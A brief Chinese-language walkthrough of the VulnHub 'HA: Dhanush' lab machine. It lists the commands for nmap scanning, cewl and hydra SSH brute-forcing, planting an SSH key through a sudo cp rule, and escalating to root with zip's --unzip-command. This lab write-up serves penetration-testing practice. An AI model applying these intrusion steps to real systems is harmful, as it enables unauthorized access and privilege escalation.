靶机地址:https://www.vulnhub.com/entry/ha-dhanush,396/
靶机难度:初级
启动靶机,nmap扫描获取靶机ip:192.168.40.128
nmap -sP 192.168.40.0/24
扫描端口,开放了65345和80端口
nmap -sV -sC -p- 192.168.40.128
访问80端口,没有发现有用的信息,同时dirb扫描网站目录也没有发现其他有用的信息
貌似没有其他敏感文件泄露,那就试一下ssh爆破,先用cewl抓取网页的信息作为字典,然后用hydra爆破
cewl http://192.168.40.128 -w wordlist.txt
hydra -L wordlist.txt -P wordlist.txt -t 20 -s 65345 ssh://192.168.40.128
爆破出用户pinak,密码Gandiv
成功登入用户pinak
下一步进行提权,先用sudo -l 找一下有无提权的命令,发现可以以sarang用户调用cp命令
这里可以用pinak用户生成密钥对,然后利用cp复制到sarang用户的.ssh目录下的authorized_keys,再通过ssh密钥登入到sarang用户
ssh-keygen
(回车)
cd /home/pinak/.ssh
chmod 777 id_rsa.pub
cp id_rsa.pub ../id_rsa.pub
cd ..
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
用ssh连接登入用户sarang
ssh sarang@127.0.0.1 -i ./.ssh/id_rsa -p 65345
登入后,sudo -l 发现可以用zip提权
touch test.txt sudo zip test.zip test.txt -T --unzip-command="sh -c /bin/bash"
提权成root
参考:
https://www.cnblogs.com/hack404/archive/2020/01/02/12132901.html